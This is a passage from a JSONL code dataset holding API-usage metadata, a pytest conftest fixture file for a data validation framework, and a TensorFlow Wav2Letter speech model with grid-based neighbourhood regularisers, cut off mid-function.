"jax.numpy.array", "line_number": 354, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 354, "usage_type": "name"}, {"api_name": "jax.numpy.pi", "line_number": 354, "usage_type": "attribute"}, {"api_name": "jax.numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 355, "usage_type": "name"}, {"api_name": "jax.Array", "line_number": 360, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 361, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 310, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 370, "usage_type": "call"}, {"api_name": "jax.numpy.polyval", "line_number": 373, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 373, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 376, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 376, "usage_type": "name"}, {"api_name": "jax.numpy.sin", "line_number": 379, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 379, "usage_type": "name"}, {"api_name": "jax.numpy.cos", "line_number": 379, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 381, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 383, "usage_type": "call"}, {"api_name": "jax.numpy.array", "line_number": 385, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 385, "usage_type": "name"}, {"api_name": "pennylane.PauliZ", "line_number": 386, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 390, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 391, "usage_type": "call"}, {"api_name": "pennylane.qnode", "line_number": 388, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 396, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 397, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 393, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 394, "usage_type": "call"}, {"api_name": "jax.numpy.ones", "line_number": 399, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 399, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 399, "usage_type": "call"}, {"api_name": "jax.numpy.pi", "line_number": 399, "usage_type": "attribute"}, {"api_name": "jax.Array", "line_number": 403, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 404, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 363, "usage_type": "attribute"}, {"api_name": "jax.numpy.eye", "line_number": 413, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 413, "usage_type": "name"}, {"api_name": "jax.scipy.linalg.expm", "line_number": 414, "usage_type": "call"}, {"api_name": "jax.scipy", "line_number": 414, "usage_type": "attribute"}, {"api_name": "pennylane.matrix", "line_number": 414, "usage_type": "call"}, {"api_name": "pennylane.matrix", "line_number": 416, "usage_type": "call"}, {"api_name": "pennylane.device", "line_number": 419, "usage_type": "call"}, {"api_name": "pennylane.pulse.rydberg_interaction", "line_number": 423, "usage_type": "call"}, {"api_name": "pennylane.pulse", "line_number": 423, "usage_type": "attribute"}, {"api_name": "pennylane.pulse.rydberg_drive", "line_number": 425, "usage_type": "call"}, {"api_name": "pennylane.pulse", "line_number": 425, "usage_type": "attribute"}, {"api_name": "pennylane.PauliZ", "line_number": 427, "usage_type": "call"}, {"api_name": "pennylane.evolve", "line_number": 432, "usage_type": "call"}, {"api_name": "pennylane.expval", "line_number": 433, "usage_type": "call"}, {"api_name": "jax.jit", "line_number": 429, "usage_type": "attribute"}, {"api_name": "pennylane.qnode", "line_number": 430, "usage_type": "call"}, {"api_name": "jax.numpy.linspace", "line_number": 435, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 435, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 441, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 406, "usage_type": "attribute"}]} +{"seq_id": "7258223844", "text": "\"\"\"Configuration for the pytest test suite.\"\"\"\n# pylint: disable=missing-function-docstring\nimport os\nfrom pathlib import Path\n\nimport pytest\n\nfrom data_validation_framework.target import OutputLocalTarget\n\nDATA = Path(__file__).parent / \"data\"\n\n\n@pytest.fixture()\ndef tmp_working_dir(tmp_path):\n \"\"\"Change working directory before a test and change it back when the test is finished.\"\"\"\n cwd = os.getcwd()\n os.chdir(tmp_path)\n yield tmp_path\n os.chdir(cwd)\n\n\n@pytest.fixture()\ndef data_dir():\n \"\"\"Path to the directory where the data are stored.\"\"\"\n return DATA\n\n\n@pytest.fixture(autouse=True)\ndef reset_target_prefix(tmpdir):\n \"\"\"Automatically set the default prefix to the current test directory.\"\"\"\n OutputLocalTarget.set_default_prefix(tmpdir)\n yield\n OutputLocalTarget.set_default_prefix(None)\n", "repo_name": "BlueBrain/data-validation-framework", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 19, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 13, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "data_validation_framework.target.OutputLocalTarget.set_default_prefix", "line_number": 31, "usage_type": "call"}, {"api_name": "data_validation_framework.target.OutputLocalTarget", "line_number": 31, "usage_type": "name"}, {"api_name": "data_validation_framework.target.OutputLocalTarget.set_default_prefix", "line_number": 33, "usage_type": "call"}, {"api_name": "data_validation_framework.target.OutputLocalTarget", "line_number": 33, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "4109861303", "text": "import os\nimport time\nfrom collections import defaultdict\n\nimport tensorflow as tf\nimport tensorflow.keras.layers as layers\nimport tensorflow_probability as tfp\nimport numpy as np\n\n\nGRIDS = {16: (4, 4), 32: (8, 4), 64: (8, 8), 128: (16, 8), 256: (16, 16),\n 512: (32, 16), 1024: (32, 32), 2048: (64, 32)}\n\n\nclass W2L:\n def __init__(self, model_dir, vocab_size, n_channels, data_format,\n reg=(None, 0.)):\n if data_format not in [\"channels_first\", \"channels_last\"]:\n raise ValueError(\"Invalid data type specified: {}. Use either \"\n \"channels_first or \"\n \"channels_last.\".format(data_format))\n\n self.model_dir = model_dir\n self.data_format = data_format\n self.cf = self.data_format == \"channels_first\"\n self.n_channels = n_channels\n self.vocab_size = vocab_size\n self.regularizer_type = reg[0]\n self.regularizer_coeff = reg[1]\n\n self.model = self.make_w2l_model()\n if os.path.isdir(model_dir) and os.listdir(model_dir):\n print(\"Model directory already exists. Loading last model...\")\n last = self.get_last_model()\n # TODO this is a hack!!!\n # need to properly write the regularizer as a custom Keras object\n # like this, continuing training will not work properly!!!\n #self.model = tf.keras.models.load_model(\n # os.path.join(model_dir, last),\n # custom_objects={\"neighbor_distance\": lambda x: x})\n self.model.load_weights(os.path.join(model_dir, last))\n self.step = int(last[:-3])\n print(\"...loaded {}.\".format(last))\n else:\n print(\"Model directory does not exist. Creating new model...\")\n if not os.path.isdir(model_dir):\n os.mkdir(model_dir)\n self.step = 0\n\n self.writer = tf.summary.create_file_writer(model_dir)\n\n def make_w2l_model(self):\n \"\"\"Creates a Keras model that does the W2L forward computation.\n\n Just goes from mel spectrogram input to logits output.\n\n Returns:\n Keras sequential model.\n\n TODO could allow model configs etc. For now, architecture is hardcoded\n\n \"\"\"\n channel_ax = 1 if self.cf else -1\n\n if self.regularizer_type:\n #reg_target, reg_type, reg_edges, reg_size = self.regularizer_type.split(\"_\")\n reg_target, reg_power = self.regularizer_type.split(\"_\")\n\n #def reg_fn_builder(n_f):\n # return sebastians_magic_trick(\n # diff_norm=reg_type, weight_norm=\"l2\", grid_dims=GRIDS[n_f],\n # neighbor_size=int(reg_size),\n # cf=(self.cf and reg_target == \"act\"),\n # edges=reg_edges, on_activities=reg_target == \"act\")\n\n def reg_fn_builder(n_f):\n return jens_magick_trick(\n grid_dims=GRIDS[n_f], cf=(self.cf and reg_target == \"act\"),\n on_activities=reg_target == \"act\",\n power=float(reg_power))\n else:\n reg_target = None\n\n def reg_conv1d(n_f, w_f, stride):\n return layers.Conv1D(\n n_f, w_f, stride, padding=\"same\", data_format=self.data_format,\n use_bias=False,\n kernel_regularizer=reg_fn_builder(\n n_f) if reg_target == \"weight\" else None,\n activity_regularizer=reg_fn_builder(\n n_f) if reg_target == \"act\" else None)\n\n def act(n_f):\n return layers.ReLU(activity_regularizer=reg_fn_builder(\n n_f) if reg_target == \"act\" else None)\n\n @tf.custom_gradient\n def binarizer(inp):\n def straight_through(dy):\n return tf.where(tf.greater(dy, 1.), 0., dy)\n\n return tf.where(tf.greater_equal(inp, 0.), 1., -1.), straight_through\n #actfn = layers.Lambda(binarizer)\n #def act(n_f): return layers.Lambda(binarizer)\n\n layer_list = [\n layers.BatchNormalization(channel_ax),\n reg_conv1d(256, 48, 2),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(256, 7, 1),\n layers.BatchNormalization(channel_ax),\n act(256),\n reg_conv1d(2048, 32, 1),\n layers.BatchNormalization(channel_ax),\n act(2048),\n reg_conv1d(2048, 1, 1),\n layers.BatchNormalization(channel_ax),\n act(2048),\n layers.Conv1D(self.vocab_size + 1, 1, 1, \"same\", self.data_format)\n ]\n\n # w2l = tf.keras.Sequential(layer_list, name=\"w2l\")\n\n inp = tf.keras.Input((self.n_channels, None) if self.cf\n else (None, self.n_channels))\n layer_outputs = [inp]\n for layer in layer_list:\n layer_outputs.append(layer(layer_outputs[-1]))\n # only include relu layers in outputs\n relevant = layer_outputs[4::3] + [layer_outputs[-1]]\n\n w2l = tf.keras.Model(inputs=inp, outputs=relevant)\n\n return w2l\n\n def forward(self, audio, training=False, return_all=False):\n \"\"\"Simple forward pass of a W2L model to compute logits.\n\n Parameters:\n audio: Tensor of mel spectrograms, channels_first!\n training: Bool, if true assuming training mode otherwise inference.\n Important for batchnorm to work properly.\n return_all: Bool, if true, return list of all layer activations\n (post-relu), with the logits at the very end.\n\n Returns:\n Result of applying model to audio (list or tensor depending on\n return_all).\n\n \"\"\"\n if not self.cf:\n audio = tf.transpose(audio, [0, 2, 1])\n\n out = self.model(audio, training=training)\n if return_all:\n return out\n else:\n return out[-1]\n\n def train_step(self, audio, audio_length, transcrs, transcr_length,\n optimizer, on_gpu):\n \"\"\"Implements train step of the W2L model.\n\n Parameters:\n audio: Tensor of mel spectrograms, channels_first!\n audio_length: \"True\" length of each audio clip.\n transcrs: Tensor of transcriptions (indices).\n transcr_length: \"True\" length of each transcription.\n optimizer: Optimizer instance to do training with.\n on_gpu: Bool, whether running on GPU. This changes how the\n transcriptions are handled. Currently ignored!!\n\n Returns:\n Loss value.\n\n \"\"\"\n with tf.GradientTape() as tape:\n logits = self.forward(audio, training=True, return_all=False)\n # after this we need logits in shape time x batch_size x vocab_size\n if self.cf: # bs x v x t -> t x bs x v\n logits_tm = tf.transpose(logits, [2, 0, 1],\n name=\"logits_time_major\")\n else: # channels last: bs x t x v -> t x bs x v\n logits_tm = tf.transpose(logits, [1, 0, 2],\n name=\"logits_time_major\")\n\n audio_length = tf.cast(audio_length / 2, tf.int32)\n\n if False: #on_gpu: # this seems to be slow so we don't use it\n ctc_loss = tf.reduce_mean(tf.nn.ctc_loss(\n labels=transcrs, logits=logits_tm, label_length=transcr_length,\n logit_length=audio_length, logits_time_major=True,\n blank_index=0), name=\"avg_loss\")\n else:\n transcrs_sparse = dense_to_sparse(transcrs, sparse_val=-1)\n ctc_loss = tf.reduce_mean(tf.nn.ctc_loss(\n labels=transcrs_sparse, logits=logits_tm, label_length=None,\n logit_length=audio_length, logits_time_major=True,\n blank_index=0), name=\"avg_loss\")\n\n if self.regularizer_coeff:\n avg_reg_loss = tf.math.add_n(self.model.losses) / len(self.model.losses)\n loss = ctc_loss + self.regularizer_coeff * avg_reg_loss\n else:\n loss = ctc_loss\n avg_reg_loss = 0\n\n grads = tape.gradient(loss, self.model.trainable_variables)\n optimizer.apply_gradients(zip(grads, self.model.trainable_variables))\n\n # probably has to go into train_full...\n #self.annealer.update_history(loss)\n\n return ctc_loss, avg_reg_loss\n\n def train_full(self, dataset, steps, adam_params, on_gpu):\n \"\"\"Full training logic for W2L.\n\n Parameters:\n dataset: tf.data.Dataset as produced in input.py.\n steps: Number of training steps.\n adam_params: List/tuple of four parameters for Adam: learning rate,\n beta1, beta2, epsilon.\n on_gpu: Bool, whether running on a GPU.\n\n \"\"\"\n # TODO more flexible checkpointing. this will simply do 10 checkpoints overall\n check_freq = steps // 10\n data_step_limited = dataset.take(steps)\n\n # TODO use annealing\n #self.annealer = AnnealIfStuck(adam_params[0], 0.1, 20000)\n # TODO don't hardcode this\n schedule = tf.optimizers.schedules.PiecewiseConstantDecay(\n [200000, 250000], [adam_params[0], adam_params[0]/10,\n adam_params[0]/(5*10)])\n opt = tf.optimizers.Adam(schedule, *adam_params[1:])\n opt.iterations.assign(self.step)\n\n audio_shape = [None, self.n_channels, None] if self.cf \\\n else [None, None, self.n_channels]\n\n def train_fn(w, x, y, z):\n return self.train_step(w, x, y, z, opt, on_gpu)\n\n graph_train = tf.function(\n train_fn, input_signature=[tf.TensorSpec(audio_shape, tf.float32),\n tf.TensorSpec([None], tf.int32),\n tf.TensorSpec([None, None], tf.int32),\n tf.TensorSpec([None], tf.int32)])\n # graph_train = train_fn # skip tf.function\n\n start = time.time()\n for features, labels in data_step_limited:\n if not self.step % check_freq:\n print(\"Saving checkpoint...\")\n self.model.save(os.path.join(\n self.model_dir, str(self.step).zfill(6) + \".h5\"))\n\n ctc, reg_loss = graph_train(features[\"audio\"], features[\"length\"],\n labels[\"transcription\"], labels[\"length\"])\n\n if not self.step % 500:\n stop = time.time()\n print(\"Step: {}. CTC: {}\".format(self.step, ctc.numpy()))\n print(\"{} seconds passed...\".format(stop-start))\n\n if not self.step % 100:\n with self.writer.as_default():\n tf.summary.scalar(\"loss/ctc\", ctc, step=self.step)\n if self.regularizer_coeff:\n tf.summary.scalar(\"loss/nd_reg\", reg_loss,\n step=self.step)\n\n self.step += 1\n\n self.model.save_weights(os.path.join(\n self.model_dir, str(self.step).zfill(6) + \".h5\"))\n\n def decode(self, audio, audio_length, return_intermediate=False):\n \"\"\"Wrapper to decode using W2L model.\n\n Parameters:\n audio: Tensor of mel spectrograms, channels_first!\n audio_length: \"True\" length of each audio clip.\n return_intermediate: Bool; if true, return intermediate layer\n results in addition to the decodings.\n\n Returns:\n Sparse or dense tensor with the top predictions.\n If return_intermediate is True, output is a tuple, first element\n being the predictions and second element a list of intermediate\n outputs.\n\n \"\"\"\n forward = self.forward(audio, training=False,\n return_all=return_intermediate)\n if return_intermediate:\n logits = forward[-1]\n else:\n logits = forward\n\n if self.cf:\n logits = tf.transpose(logits, [2, 0, 1])\n else:\n logits = tf.transpose(logits, [1, 0, 2])\n\n decoded = self.ctc_decode_top(logits, audio_length, pad_val=-1)\n if return_intermediate:\n return decoded, forward\n else:\n return decoded\n\n def ctc_decode_top(self, logits, seq_lengths, beam_width=100, pad_val=-1,\n as_sparse=False):\n \"\"\"Simpler version of ctc decoder that only returns the top result.\n\n Parameters:\n logits: Passed straight to ctc decoder. This has to be time-major\n and channels_last!!\n seq_lengths: Same.\n beam_width: Same.\n pad_val: Value to use to pad dense tensor. No effect if as_sparse is\n True.\n as_sparse: If True, return results as sparse tensor.\n\n Returns:\n Sparse or dense tensor with the top predictions.\n\n \"\"\"\n with tf.name_scope(\"decoding\"):\n decoded_sparse_list, _ = tf.nn.ctc_beam_search_decoder(\n logits, seq_lengths//2, beam_width=beam_width, top_paths=1)\n decoded_sparse = decoded_sparse_list[0]\n decoded_sparse = tf.cast(decoded_sparse, tf.int32)\n if as_sparse:\n return decoded_sparse\n else:\n # this should result in a bs x t matrix of predicted classes\n return tf.sparse.to_dense(decoded_sparse,\n default_value=pad_val,\n name=\"dense_decoding\")\n\n def get_last_model(self):\n ckpts = [file for file in os.listdir(self.model_dir) if file.endswith(\".h5\")]\n if \"final.h5\" in ckpts:\n return \"final.h5\"\n else:\n return sorted(ckpts)[-1]\n\n\nclass AnnealIfStuck(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self, base_lr, factor, n_steps):\n \"\"\"Anneal the learning rate if loss doesn't decrease anymore.\n\n Refer to\n http://blog.dlib.net/2018/02/automatic-learning-rate-scheduling-that.html.\n\n Parameters:\n base_lr: LR to start with.\n factor: By what to multiply in case we're stuck.\n n_steps: How often to check if we're stuck.\n\n \"\"\"\n super(AnnealIfStuck, self).__init__()\n self.n_steps = n_steps\n self.lr = base_lr\n self.factor = factor\n self.loss_history = tf.Variable(\n np.zeros(n_steps), trainable=False, dtype=tf.float32,\n name=\"loss_history\")\n\n def __call__(self, step):\n if tf.logical_or(tf.greater(tf.math.mod(step, self.n_steps), 0),\n tf.equal(step, 0)):\n pass\n else:\n x1 = tf.range(self.n_steps, dtype=tf.float32, name=\"x\")\n x2 = tf.ones([self.n_steps], dtype=tf.float32, name=\"bias\")\n x = tf.stack((x1, x2), axis=1, name=\"input\")\n slope_bias = tf.linalg.lstsq(x, self.loss_history[:, tf.newaxis],\n name=\"solution\")\n slope = slope_bias[0][0]\n bias = slope_bias[1][0]\n preds = slope * x1 + bias\n\n data_var = 1 / (self.n_steps - 2) * tf.reduce_sum(\n tf.square(self.loss_history - preds))\n dist_var = 12 * data_var / (self.n_steps ** 3 - self.n_steps)\n dist = tfp.distributions.Normal(slope, tf.sqrt(dist_var),\n name=\"slope_distribution\")\n prob_decreasing = dist.cdf(0., name=\"prob_below_zero\")\n\n if tf.less_equal(prob_decreasing, 0.5):\n self.lr *= self.factor\n return self.lr\n\n def check_lr(self):\n return self.lr\n\n def update_history(self, new_val):\n self.loss_history.assign(tf.concat((self.loss_history[1:], [new_val]),\n axis=0))\n\n\ndef dense_to_sparse(dense_tensor, sparse_val=-1):\n \"\"\"Inverse of tf.sparse_to_dense.\n\n Parameters:\n dense_tensor: The dense tensor. Duh.\n sparse_val: The value to \"ignore\": Occurrences of this value in the\n dense tensor will not be represented in the sparse tensor.\n NOTE: When/if later restoring this to a dense tensor, you\n will probably want to choose this as the default value.\n\n Returns:\n SparseTensor equivalent to the dense input.\n\n \"\"\"\n with tf.name_scope(\"dense_to_sparse\"):\n sparse_inds = tf.where(tf.not_equal(dense_tensor, sparse_val),\n name=\"sparse_inds\")\n sparse_vals = tf.gather_nd(dense_tensor, sparse_inds,\n name=\"sparse_vals\")\n dense_shape = tf.shape(dense_tensor, name=\"dense_shape\",\n out_type=tf.int64)\n return tf.SparseTensor(sparse_inds, sparse_vals, dense_shape)\n\n\ndef sebastians_magic_trick(diff_norm, weight_norm, grid_dims, neighbor_size,\n cf, edges, on_activities):\n \"\"\"Creates a neighborhood distance regularizer.\n\n Parameters:\n diff_norm: How to compute differences/distances between filters.\n Can be \"l1\", \"l2\" or \"linf\" for respective norms, or \"cos\"\n for cosine distance..\n weight_norm: How to compute neighborhood weightings, i.e. how points\n further away in the neighborhood play into the overall\n penalty. Options same as for diff_norm, except for \"cos\".\n grid_dims: 2-tuple or list giving the desired grid dimensions. Has to\n match the number of filters for the layer to regularize.\n neighbor_size: int, giving the size of the neighborhood. Must be odd.\n E.g. giving 3 here will cause each filter to treat the\n immediately surrounding filters (including diagonally)\n as its neighborhood.\n cf: Whether the regularizer target will be channels_first. Should only\n be true if we are regularizing activation maps, not filter weights,\n and channels_first data format is used. If on_activities is False,\n this is ignored.\n edges: String, how to treat edges. See CLI file for options.\n on_activities: Bool; if True, we assume that we are working on\n activities, which is slightly different than when\n working on kernels (if False, kernels are assumed).\n\n \"\"\"\n if not neighbor_size % 2:\n raise ValueError(\"Neighborhood is not odd; this would mean no middle \"\n \"point!\")\n if edges not in {\"no\", \"occ\", \"wrap\", \"mirror\"}:\n raise ValueError(\"Invalid edge option specified: {}. Valid are 'no', \"\n \"'occ' and 'wrap'.\".format(edges))\n\n # first we compute the possible offsets around a given point\n neighbors_per_direction = (neighbor_size - 1) // 2\n neighbor_offsets = []\n for offset_x in range(-neighbors_per_direction,\n neighbors_per_direction + 1):\n for offset_y in range(-neighbors_per_direction,\n neighbors_per_direction + 1):\n if offset_x == 0 and offset_y == 0:\n continue # skip center\n neighbor_offsets.append([offset_x, offset_y])\n neighbor_offsets = np.asarray(neighbor_offsets, dtype=np.int32)\n\n len_x = grid_dims[0]\n len_y = grid_dims[1]\n filters_total = len_x * len_y\n\n # get neighbors for each filter\n neighbor_lists = []\n for ci in range(filters_total):\n neighbors = []\n # derive x and y coordinate in filter space\n cy = ci % len_y\n cx = ci // len_y\n for offset in neighbor_offsets:\n offset_x = cx + offset[0]\n offset_y = cy + offset[1]\n\n if edges == \"wrap\":\n if offset_x < 0:\n offset_x += len_x\n elif offset_x >= len_x:\n offset_x -= len_x\n if offset_y < 0:\n offset_y += len_y\n elif offset_y >= len_y:\n offset_y -= len_y\n\n elif edges == \"mirror\":\n if offset_x < 0:\n offset_x = -offset_x\n elif offset_x >= len_x:\n d = offset_x - (len_x - 1)\n offset_x = len_x - 1 - d\n\n if offset_y < 0:\n offset_y -= offset_y\n elif offset_y >= len_y:\n d = offset_y - (len_y - 1)\n offset_y = len_y - 1 - d\n\n if 0 <= offset_x < len_x and 0 <= offset_y < len_y:\n # add neighbor if valid coordinate\n ni = offset_y * len_x + offset_x\n neighbors.append(ni)\n neighbor_lists.append(neighbors)\n\n # filter neighbor lists to only contain full neighborhoods\n center_ids = []\n neighbor_ids = []\n for ci, nis in enumerate(neighbor_lists):\n # e.g. in a 5x5 grid there are max. 24 neighbors\n if len(nis) == neighbor_size**2 - 1:\n center_ids.append(ci)\n neighbor_ids.append(nis)\n center_ids = np.asarray(center_ids, dtype=np.int32)\n neighbor_ids = np.asarray(neighbor_ids, dtype=np.int32)\n\n # weigh points further away in the neighborhood less\n neighbor_weights = []\n for offsets in neighbor_offsets:\n if weight_norm == \"l1\":\n d = np.abs(offsets).sum()\n elif weight_norm == \"l2\":\n d = np.sqrt((offsets*offsets).sum())\n elif weight_norm == \"linf\":\n d = np.abs(offsets).max()\n else:\n raise ValueError(\"Invalid weight norm specified: {}. \"\n \"Valid are 'l1', 'l2', \"\n \"'linf'.\".format(weight_norm))\n w = 1. / d\n neighbor_weights.append(w)\n neighbor_weights = np.asarray(neighbor_weights, dtype=np.float32)\n\n if edges == \"occ\":\n # less often occurring positions are weighted more\n index_occurrences = defaultdict(int)\n for neighborhood in neighbor_ids:\n for neighbor in neighborhood:\n index_occurrences[neighbor] += 1\n\n max_occur = max(index_occurrences.values())\n\n neighbor_weights_occ = np.zeros(\n (len(neighbor_ids), len(neighbor_weights)),\n dtype=np.float32)\n for row in range(len(neighbor_ids)):\n for col in range(len(neighbor_weights)):\n occs_here = index_occurrences[neighbor_ids[row][col]]\n neighbor_weights_occ[row, col] = (neighbor_weights[col] *\n max_occur / occs_here)\n neighbor_weights = neighbor_weights_occ\n else:\n neighbor_weights = np.tile(neighbor_weights, reps=[len(center_ids), 1])\n\n neighbor_weights /= neighbor_weights.sum() # normalize to sum=1\n\n # now convert numpy arrays to tf constants\n tf_neighbor_weights = tf.constant(neighbor_weights,\n name='neighbor_weights')\n tf_center_ids = tf.constant(center_ids, name='center_ids')\n tf_neighbor_ids = tf.constant(neighbor_ids, name='neighbor_ids')\n\n def neighbor_distance(inputs):\n \"\"\"If cf is true we assume channels first. Otherwise last, this also\n covers the case where the inputs are filter weights!\n \"\"\"\n\n # TODO mask\n # TODO \"factorize\" over batch (or time?)\n if on_activities:\n if cf:\n n_filters = inputs.shape[1]\n else:\n n_filters = inputs.shape[-1]\n n_batch = inputs.shape[0]\n else:\n n_filters = inputs.shape[-1]\n n_batch = 1 # could also treat input channels as \"batch axis\"\n if n_filters != filters_total:\n raise ValueError(\n \"Unsuitable grid for weight {}. \"\n \"Grid dimensions: {}, {} for a total of {} entries. \"\n \"Filters in weight: {}.\".format(\n inputs.name, len_x, len_y, filters_total, n_filters))\n # reshape to n_filters x batch x d\n # in case of activities, d = t (or w*h or whatever)\n # in case of kernels, d = kernel_w*in_channels and batch = 1\n if on_activities:\n if cf:\n perm = [1, 0] + list(range(2, len(inputs.shape)))\n else:\n perm = [len(inputs.shape) - 1, 0] + list(range(1, len(inputs.shape) - 1))\n inputs = tf.transpose(inputs, perm)\n inputs = tf.reshape(inputs, [n_filters, n_batch, -1])\n else:\n inputs = tf.reshape(inputs, [-1, n_batch, n_filters])\n inputs = tf.transpose(inputs, [2, 1, 0])\n\n if diff_norm == \"l1\":\n # to prevent weights from just shrinking (instead of getting\n # more similar) we apply a \"global\" normalization\n # note that local normalization (normalizing each filter\n # separately) would ignore scale differences between filters,\n # thus not forcing them to be \"equal\" properly\n # TODO maybe this makes weights too small?\n # maybe local normalization is enough? cosine similarity\n # basically does the same thing...\n inputs = inputs / (tf.norm(inputs, ord=1) + 1e-8)\n elif diff_norm == \"l2\":\n inputs = inputs / (tf.norm(inputs) + 1e-8)\n elif diff_norm == \"linf\":\n inputs = inputs / (tf.norm(inputs, ord=np.inf) + 1e-8)\n\n # reshape to n_centers x 1 x d for broadcasting\n tf_centers = tf.gather(inputs, tf_center_ids)\n tf_centers = tf.expand_dims(tf_centers, 1)\n\n # n_centers x n_neighbors x d\n tf_neighbors = tf.gather(inputs, tf_neighbor_ids)\n\n # compute pairwise distances, then weight, then sum up\n # pairwise is always n_centers x n_neighbors\n if diff_norm == \"l1\":\n pairwise = tf.reduce_sum(tf.abs(tf_centers - tf_neighbors),\n axis=-1)\n elif diff_norm == \"l2\":\n pairwise = tf.sqrt(\n tf.reduce_sum((tf_centers - tf_neighbors)**2, axis=-1))\n elif diff_norm == \"linf\":\n pairwise = tf.reduce_max(tf.abs(tf_centers - tf_neighbors),\n axis=-1)\n elif diff_norm == \"cos\":\n dotprods = tf.reduce_sum(tf_centers * tf_neighbors, axis=-1)\n center_norms = tf.norm(tf_centers, axis=-1)\n neighbor_norms = tf.norm(tf_neighbors, axis=-1)\n # NOTE this computes cosine *similarity* which is why we\n # multiply by -1: minimize the negative similarity!\n cosine_similarity = dotprods / (center_norms * neighbor_norms +\n 1e-8)\n pairwise = -1 * cosine_similarity\n else:\n raise ValueError(\"Invalid difference norm specified: {}. \"\n \"Valid are 'l1', 'l2', 'linf', \"\n \"'cos'.\".format(weight_norm))\n pw_mean_over_batch = tf.reduce_mean(pairwise, axis=-1)\n pairwise_weighted = tf_neighbor_weights * pw_mean_over_batch\n\n # keras divides activity regularizer by batch size.....\n # so we counteract that there\n factor = tf.cast(tf.shape(inputs)[0], tf.float32) if on_activities else 1.\n return factor * tf.reduce_sum(pairwise_weighted)\n\n return neighbor_distance\n\n\ndef jens_magick_trick(grid_dims, cf, on_activities, power=1., test=False):\n len_x = grid_dims[0]\n len_y = grid_dims[1]\n filters_total = len_x * len_y\n\n # get x,y coord in grid for each filter\n xy_coords = []\n for ci in range(filters_total):\n cy = ci % len_y\n cx = ci // len_y\n xy_coords.append((cx, cy))\n xy_coords = np.array(xy_coords, dtype=np.float32)\n\n # use euclidean or whatever\n distance_mat = np.sqrt(\n np.sum((xy_coords[None, :] - xy_coords[:, None]) ** 2, axis=-1))\n # distance_mat = np.sum(np.abs(xy_coords[None, :] - xy_coords[:, None]), axis=-1)\n\n # normalize\n # could do extremely nonlinear re-scaling, thresholding etc.\n # for now, just scale to [-1, 1]\n distance_mat = np.power(distance_mat, power)\n sim_mat_g = -distance_mat\n sim_mat_g -= sim_mat_g.min() # relies on distances being >= 0 and 0 for identical positions (main diagonal)\n sim_mat_g /= sim_mat_g.max()\n\n if test:\n return distance_mat, sim_mat_g\n\n sim_mat_g = tf.constant(sim_mat_g)\n\n def neighbor_distance(inputs):\n if on_activities:\n if cf:\n n_filters = inputs.shape[1]\n else:\n n_filters = inputs.shape[-1]\n n_batch = tf.shape(inputs)[0]\n else:\n n_filters = inputs.shape[-1]\n n_batch = 1 # could also treat input channels as \"batch axis\"\n if n_filters != filters_total:\n raise ValueError(\n \"Unsuitable grid for weight {}. \"\n \"Grid dimensions: {}, {} for a total of {} entries. \"\n \"Filters in weight: {}.\".format(\n inputs.name, len_x, len_y, filters_total, n_filters))\n # reshape to n_filters x batch x d\n # in case of activities, d = t (or w*h or whatever)\n # in case of kernels, d = kernel_w*in_channels and batch = 1\n if on_activities:\n if not cf:\n perm = [0, len(inputs.shape) - 1] + list(range(1, len(inputs.shape) - 1))\n inputs = tf.transpose(inputs, perm)\n inputs = tf.reshape(inputs, [n_batch, n_filters, -1])\n else:\n inputs = tf.reshape(inputs, [-1, n_batch, n_filters])\n inputs = tf.transpose(inputs, [1, 2, 0])\n\n # compute ALL similarities!!!!!!!!1\n sim_mat = tf.matmul(inputs, tf.transpose(inputs, [0, 2, 1]))\n norms = 